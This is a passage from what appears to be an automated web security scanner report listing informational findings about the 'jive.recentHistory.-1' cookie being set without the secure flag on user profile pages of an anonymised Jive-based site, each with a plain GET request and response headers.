User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.x.com
Connection: Keep-Alive
Cookie: JSESSIONID=7FE401956C0FCEA7A6B398FD70CFF9EB.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d; jive.recentHistory.-1=31342c323237363b31342c323030383b

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:38:49 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323237363b31342c323030383b332c35333735313b332c36303039313b332c3133363935343b332c3133383538323b332c3133373131353b; Expires=Sun, 11-Sep-2011 13:38:49 GMT; Path=/
Vary: User-Agent
JP: D=151430 t=1313156329683258
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.171. https://www.x.com/people/CorinneSherman

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/CorinneSherman

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/CorinneSherman HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:53 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:51:54 GMT; Path=/
Vary: User-Agent
JP: D=153786 t=1313157114086096
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.172. https://www.x.com/people/GiancarloUk2

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/GiancarloUk2

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/GiancarloUk2 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:28 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c38383139383b332c3131353037373b332c3130383730353b332c3131303734313b332c3131303831343b332c38323534333b332c3131353130373b332c38353530363b332c3131313737343b332c38373839383b; Expires=Sun, 11-Sep-2011 13:52:29 GMT; Path=/
Vary: User-Agent
JP: D=109527 t=1313157149159421
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.173. https://www.x.com/people/IndieReign

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/IndieReign

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/IndieReign HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:30 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c3134303730373b332c38383139383b332c38373839383b332c3134313133383b332c38353530363b332c3134303532383b332c3131353130373b332c3131303734313b332c3131313737343b332c3131353037373b; Expires=Sun, 11-Sep-2011 13:52:30 GMT; Path=/
Vary: User-Agent
JP: D=98253 t=1313157150770204
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.174. https://www.x.com/people/JasonVenner

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/JasonVenner

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/JasonVenner HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:49 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:51:49 GMT; Path=/
Vary: User-Agent
JP: D=146802 t=1313157109565171
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.175. https://www.x.com/people/MrcheckAPX

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/MrcheckAPX

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/MrcheckAPX HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:47 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b332c38393734373b332c3133393930333b332c3134303730373b33382c363333363b; Expires=Sun, 11-Sep-2011 13:52:48 GMT; Path=/
Vary: User-Agent
JP: D=97089 t=1313157168042186
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.176. https://www.x.com/people/PP_Igor

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/PP_Igor

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/PP_Igor HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:09 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:52:09 GMT; Path=/
Vary: User-Agent
JP: D=77818 t=1313157129602041
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.177. https://www.x.com/people/PP_MTS_Andre

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/PP_MTS_Andre

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/PP_MTS_Andre HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:05 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:52:06 GMT; Path=/
Vary: User-Agent
JP: D=85787 t=1313157126041615
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.178. https://www.x.com/people/PP_MTS_Chad

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/PP_MTS_Chad

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/PP_MTS_Chad HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:03 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:52:04 GMT; Path=/
Vary: User-Agent
JP: D=167980 t=1313157123846369
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.179. https://www.x.com/people/PP_MTS_GuidoT

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/PP_MTS_GuidoT

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/PP_MTS_GuidoT HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:07 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:52:07 GMT; Path=/
Vary: User-Agent
JP: D=96030 t=1313157127847926
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.180. https://www.x.com/people/PP_MTS_Magarvin

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/PP_MTS_Magarvin

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/PP_MTS_Magarvin HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:03 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:52:04 GMT; Path=/
Vary: User-Agent
JP: D=130947 t=1313157124385931
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.181. https://www.x.com/people/PP_MTS_Patrick

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/PP_MTS_Patrick

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/PP_MTS_Patrick HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:12 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:52:13 GMT; Path=/
Vary: User-Agent
JP: D=143994 t=1313157132945144
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.182. https://www.x.com/people/PayPalXadmin

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/PayPalXadmin

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/PayPalXadmin HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:39 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c323030313b332c313b332c38393734373b332c3133393930333b332c3134303730373b332c3134303532383b332c3134313133383b332c38383139383b332c38373839383b332c38353530363b33382c363333363b; Expires=Sun, 11-Sep-2011 13:52:39 GMT; Path=/
Vary: User-Agent
JP: D=96924 t=1313157159108661
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.183. https://www.x.com/people/PayPal_Carolyn

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/PayPal_Carolyn

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/PayPal_Carolyn HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:51 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:51:51 GMT; Path=/
Vary: User-Agent
JP: D=182753 t=1313157111682138
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.184. https://www.x.com/people/PayPal_Sudha

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/PayPal_Sudha

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/PayPal_Sudha HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:52 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:51:52 GMT; Path=/
Vary: User-Agent
JP: D=104130 t=1313157112744233
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.185. https://www.x.com/people/PayPal_ToddS

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/PayPal_ToddS

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/PayPal_ToddS HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:14 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c323839313b332c323430323b332c3133363236393b332c3133313833303b332c31323739393b332c3133373331333b332c3133373135383b332c3132393239303b332c3133393730313b332c3132323335343b; Expires=Sun, 11-Sep-2011 13:52:14 GMT; Path=/
Vary: User-Agent
JP: D=172832 t=1313157134792842
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.186. https://www.x.com/people/Praveen

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/Praveen

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/Praveen HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:52 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:51:53 GMT; Path=/
Vary: User-Agent
JP: D=139937 t=1313157113112925
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.187. https://www.x.com/people/Praveen/blog/2011/01/31/icanhas-instant-app-approval

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/Praveen/blog/2011/01/31/icanhas-instant-app-approval

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/Praveen/blog/2011/01/31/icanhas-instant-app-approval HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:53 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323232363b31342c323037333b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b33382c343431363b33382c323436353b33382c353534353b33382c333337373b33382c353939353b33382c363030363b33382c363039373b33382c363133383b33382c363233383b33382c363238353b3130322c313130363b3130322c333831313b332c35353331393b332c35333437343b332c323030383b332c35333436333b332c35373137393b332c3133363935343b332c3133373131353b332c36303039313b332c35333735313b332c3133383538323b; Expires=Sun, 11-Sep-2011 13:51:53 GMT; Path=/
Vary: User-Agent
JP: D=129836 t=1313157113665921
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.188. https://www.x.com/people/RightWayMail

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/RightWayMail

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/RightWayMail HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:28 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c3134313133383b332c3131353037373b332c38323534333b332c3130383730353b332c3131303831343b332c38383139383b332c3131303734313b332c3131353130373b332c38353530363b332c3131313737343b; Expires=Sun, 11-Sep-2011 13:52:29 GMT; Path=/
Vary: User-Agent
JP: D=143442 t=1313157149181583
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.189. https://www.x.com/people/S.Aijaz

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/S.Aijaz

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/S.Aijaz HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:11 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:52:11 GMT; Path=/
Vary: User-Agent
JP: D=107761 t=1313157131723635
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.190. https://www.x.com/people/SRS

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/SRS

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/SRS HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:28 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c38373839383b332c3133383934323b332c3131363438333b332c32333938353b332c3131303838353b332c33393238333b332c3131383939313b332c3134313133383b332c39323635363b332c3132323433393b; Expires=Sun, 11-Sep-2011 13:52:28 GMT; Path=/
Vary: User-Agent
JP: D=95619 t=1313157148836785
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.191. https://www.x.com/people/Saleem

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/Saleem

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/Saleem HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:51 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:51:52 GMT; Path=/
Vary: User-Agent
JP: D=174302 t=1313157112089068
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.192. https://www.x.com/people/Shade8934

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/Shade8934

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/Shade8934 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:50 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:51:50 GMT; Path=/
Vary: User-Agent
JP: D=78825 t=1313157110665049
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.193. https://www.x.com/people/Suneetha

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/Suneetha

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/Suneetha HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:12 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:52:12 GMT; Path=/
Vary: User-Agent
JP: D=77775 t=1313157132121636
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.194. https://www.x.com/people/admin

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/admin

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /people/admin HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:36 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c313b332c38393734373b332c3133393930333b332c3134303730373b332c3134303532383b332c3134313133383b332c38383139383b332c38373839383b332c38353530363b332c3131353130373b33382c363333363b; Expires=Sun, 11-Sep-2011 13:52:37 GMT; Path=/
Vary: User-Agent
JP: D=92314 t=1313157157248318
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

